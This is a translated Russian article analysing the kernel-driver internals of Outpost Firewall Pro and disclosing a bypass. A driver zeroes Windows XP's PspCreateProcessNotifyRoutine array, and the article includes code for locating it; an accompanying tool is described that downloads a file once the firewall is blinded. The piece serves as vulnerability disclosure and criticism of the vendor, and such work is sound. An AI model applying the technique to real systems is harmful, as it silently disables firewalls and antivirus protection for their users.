outpost firewall 的一些技术分析

OmegacmLabs: “Firewalls. Outpost Firewall Pro”

Basic aims of this document.

 

Protection features

        Methods of protection Outpost Firewall Pro from risks are various enough. Main work of computer security incurs filtnt.sys - the driver of a kernel mode. This unit is a heart of firewall, it also realizes the system of plug-ins which provides functionality expanding, without essential change of the kernel.

The extension of plug-ins files ".ofp", probably occured from "Outpost Firewall Plug-in". I have detected the following plug-ins installed in my computer:

"Attach Quarantine" - Filters mail enclosure and automatically renames potentially dangerous files;
"Active Content" - Allows to block and control interactive of web pages contents (ActiveX, scropts, Flash and etc.);
"Attack Detection" - Allows to detect out and repulse various external and internal attacks;
"DNS Cache" - Remembers most frequently used DNS addresses for acceleration of access to web-pages;
“Content" - Blocks web pages c with a undesirable or obscene contents;
"Anti-Spyware" - Finds out and eliminates various spyware-threats, protecting your personal data from theft by Spyware programs and Trojans and prevents other undesirable and unauthorized actions;
"Ads" - Blocks banners and the advertisements contained in web-pages.

To provide work of this plug-ins filtnt.sys actively cooperates with parts of the plug-ins working in a kernel mode

adblock.dll
arp.dll
content.dll
dnscache.dll
ftpfilt.dll
htmlfilt.dll
httpfilt.dll
imapfilt.dll
mailfilt.dll
nntpfilt.dll
pop3filt.dll
protect.dll
secret.dll
sockfilt.dll

        Besides this firewall has one important feature. As is known the data in HTTP packages can be archived to decrease its size. The most frequent method to do it is gzip. Data organization in compressed mode depends on server. If the server gives such possibility, it compress the data and adds in HTTP-header flag "Accept-Encoding: gzip, deflate (null)". The accepting side (it is usually browsers) will decompress the data when notice this flag in HTTP-header.

        Dynamic library "urlmon", gives a set of functions to operate with GZIP, for example function _ReadGzipHeager, but it can not be exported.

        But Outpost Firewall Pro breaks a normal course of events and force the server to send the data in "pure" type of data, and increases traffic in several times. To affect such unbecoming conduct of firewall is possible with installing of the registry parameter HKEY_LOCAL_MACHINE/SOFTWARE/Agnitum/Outpost Firewall EnableGzipEncoding = 1. But it is necessary to notice, that in "pure" type of HTTP packages firewall can "cut" the undesirable data.

Short description of filtering methods used by Outpost Firewall Pro.

        Detailed enough description of filtration methods in ÎÑ MS WINDOWS you can find at http://ntoskrnl.com

        For Outpost Firewall Pro all looks as follows.

        Driver FILTNT.SYS at once after tcpip.sys. You can see it using an utility LoadOrder from Mark Russinovich or if you will write the driver of a kernel mode, which will record a callback procedure using a function:





NTSTATUS PsSetLoadImageNotifyRoutine(

        IN PLOAD_IMAGE_NOTIFY_ROUTINE

);




The procedure of a callback should have the prototype:



VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE) (

        IN PUNICODE_STRING FullImageName,

        IN HANDLE ProcessId,

        IN PIMAGE_INFO ImageInfo

);

And, the driver should be loaded as SERVICE_BOOT_START. It intercepts functions from library NDIS using a patch method of the export table:

NdisCloseAdapter
NdisDeregisterProtocol
NdisIMRegisterLayeredMiniport
NdisMRegisterMiniport
NdisOpenAdapter
NdisRegisterProtocol

Thus, the driver involves two methods of interception - NDIS Hooking Filter Driver and NDIS Intermediate Driver. Additional data about NDIS you can find in DDK. Also it installs filters in following devices:

/Device/RawIp, /Device/Udp, /Device/Tcp, /Device/Ip.

and creates so-called TDI-filter driver. Additional data about this interface you can also find in DDK. Besides there is an simple firewall in open code tdi_fw.

        For MS Windows XP and above IpFilterDriver is controlled by driver Agnitum Outpost Pro - the built-in filtration interface. It also used by built-in Windows XP firewall. To receive more complete information go to .http://microsoft.com.

        There is an interrelation between NDIS-packages and TDI-IRP. It means, even if your driver can bypass the TDI-filter, your IRP packages sent to the present device /Device/Tcp, will not be "missed" in a network.
Except for all it, Outpost Firewall Pro intercepts function





NTSTATUS ZwWriteVirtualMemory (

        IN HANDLE ProcessHandle,

        IN PVOID BaseAddress,

        IN PVOID Buffer,

        IN ULONG BufferLength,

        OUT PULONG ReturnLength OPTIONAL

);


by a method of a handler substitution in Service Descriptor Table. Thus, the control of trusted processes address area is provided.

        To know more about this interception method you can studying the security codes of utility RegMon which can be received from .http://www.sysinternals.com. But as it seems to me, it is not enough.

        Firewall from company ZoneLabs, intercepts more potentially dangerous functions:

ZwConnectPort
ZwCreateFile
ZwCreateKey
ZwCreateProcess
ZwCreateProcessEx
ZwCreateSection
ZwDeleteFile
ZwDeleteKey
ZwDeleteValueKey
ZwDuplicateObject
ZwLoadDriver
ZwLoadKey
ZwMapViewOfSection
ZwOpenFile
ZwOpenProcess
ZwOpenThread
ZwReplaceKey
ZwRequestWaitReplyPort
ZwRestoreKey
ZwSecureConnectPort
ZwSetInformationFile
ZwSetSystemInformation
ZwSetValueKey
ZwTerminateProcess
ZwUnloadDriver

Using registration of function callback,






NTSTATUS PsSetCreateProcessNotifyRoutine(

        IN PCREATE_PROCESS_NOTIFY_ROUTINE

        IN BOOLEAN

);




function prototype is had to be:




VOID (*PCREATE_PROCESS_NOTIFY_ROUTINE) (

        IN HANDLE ParentId,

        IN HANDLE ProcessId,

        IN BOOLEAN Create

);



        In such a way the driver filtnt.sys finds out about creation and processes termination. If we look attentively at realization of function PsSetCreateProcessNotifyRoutine we shall approximately see:


for (i=0; i < PSP_MAX_CREATE_PROCESS_NOTIFY; i++) {

        if (Remove) {

                if (PspCreateProcessNotifyRoutine[i] == NotifyRoutine) {

                        PspCreateProcessNotifyRoutine[i] = NULL;

                        PspCreateProcessNotifyRoutineCount -= 1;

                        return STATUS_SUCCESS;

                }

        } else {

                if (PspCreateProcessNotifyRoutine[i] == NULL) {

                        PspCreateProcessNotifyRoutine[i] = NotifyRoutine;

                        PspCreateProcessNotifyRoutineCount += 1;

                        return STATUS_SUCCESS;

                }

        }

}



        That is, file PspCreateProcessNotifyRoutine contains addresses of the registered callback functions which called in creation and termination of processes.

        Such realization of this function is completely fair for OS including MS Windows 2000 and older, in the later version realization is little bit another, but the sense essentially has not changed.

        What can give removal of these handlers from this array?

        I.e. zeroing of elements of array PspCreateProcessNotifyRoutine?

        The obvious answer - "absolute anything " because firewall driver could not define the facts of creation/termination of processes. Accordingly to "the list of the trusted applications", to allow/forbid access in a network in opinion of the program necessary only for them.

        But actually all battlefield situation is looks so: after such manipulations with a memory all packages from all applications can pass in a network, i.e. firewall behaves himself so as if is in a mode of inactivity for all applications, except for the list registered applications.

        So what it this? A tactical mistake or a criminal negligence?

        The unequivocal answer is not exists, but this fact speaks not for the benefit of Agnitum.

Realization.

 

        For demonstrating it will be necessary to write the ordinary driver of a kernel mode (LEGACY). The most difficult in this driver is finding of the array address PspCreateProcessNotifyRoutine the matter is that this variable is not exported and its} address differs in various versions of MS Windows NT family. Actually, I did not wanted to write the driver for all versions of operating system, so I've accepted a limitation - the driver should work stably in operating system MS Windows XP because it is the most popular operating system from NT family for today. Also we need a disassembler of instructions lengths, working in a kernel mode. I have selected ldasm because it meets necessary requirements of the task.

        The maximum number of array cells PspCreateProcessNotifyRoutine is 8, and it can contain procedures of callback not only for Outpost Firewall Pro, but also for other useful programs, anti-viruses, AntiSpyware programs.

        I remind you, that using a driver suggested by the author you declaring, that the author does not account for any possible loss brought by usage of the given driver. I respond beforehand on a question: why the suggested driver, has a number of defects and is not completed up to the end, I shall notice, that its purpose was not a help to authors of harmful programs.

        So, the fragment disassembled functions looks so:

        In register EDI the address of a variable necessary for us will be entered. The binary code looks so - 0xBF00E0548057, where 0x57 is opcode of PUSH EDI commands, and 0x80540E00 the address of a variable which is copied in register EDI. At this suppositions an heuristic method of array addresses definition PspCreateProcessNotifyRoutine is based.

        It is also shown in procedure getPspCreateProcessNotifyRoutine():


PVOID getPspCreateProcessNotifyRoutine( )

{

        PUCHAR _ptr;

        PUCHAR cPtr, pOpcode;

        ULONG Length;

        __asm {

                pushad

                mov eax, PsSetCreateProcessNotifyRoutine

                mov eax, [eax+2]

                mov eax, [eax]

                mov _ptr, eax

                popad

        }

        for (cPtr = (PUCHAR)_ptr;

                cPtr < (PUCHAR)_ptr + PAGE_SIZE;

                cPtr += Length)

        {

                Length = SizeOfCode(cPtr, &pOpcode);

                if (!Length) break;

                if (*(PUSHORT)cPtr == 0xBF && *(pOpcode + 5) == 0x57)

                {

                        return *(PVOID **)(pOpcode + 1);

                }

        }

        return NULL;

}


        In entry procedure DriverEntry (), the version of operating system is checking (I remind, that method of a variable search was tested only for MS Windows XP, so if the version of operating system is another we shall not take any actions), further array cells are simply unset.

        Also in the
archive
applied to article, you will find an application which will install and start the driver (pay attention, an Administrator rights are necessary for this operation) and if manipulations with a variable kernel have passed successfully the program will download the file from our site.

Conclusions.

 

        In my opinion, the decision of this problem will be very difficult as company representatives will say because firewall cannot determine facts of creation / termination of processes and is will be not a very difficult work to create the program which is using the described way. It threatens with occurrence of an enormous hole in security system of a personal computer with installed Agnitum Outpost Pro.

        Despite of advanced enough of network traffic control tools Outpost Firewall Pro does not meet to modern safety requirements though it is the most popular personal firewall in ex-USSR.

        Such situation when the manufacturer is not responsible to users contradicts to laws of market economy and common sense (if it exists in the nature) and revolts me very much.

        We do not call you to throw at company's office 30 silver coins, but it is necessary to think about the current order of things.

                With the best regards, © Kumbayo.

                Translated from Russian by uphill.

        In this document it will be briefly told about some features of firewall Agnitum Outpost Pro, initial representation about merits and demerits will be given, some technical details confirming legitimacy of the point of view of the author will be produced.

        The author is surprised with an existing situation when users of the software, choose this or that software being based on data received from the advertising information. The resulted data frequently do not meet reality. This situation decreases potential security of computers, thus unfair manufacturers of the software sacrifice interests of users, receiving in exchange financial profit.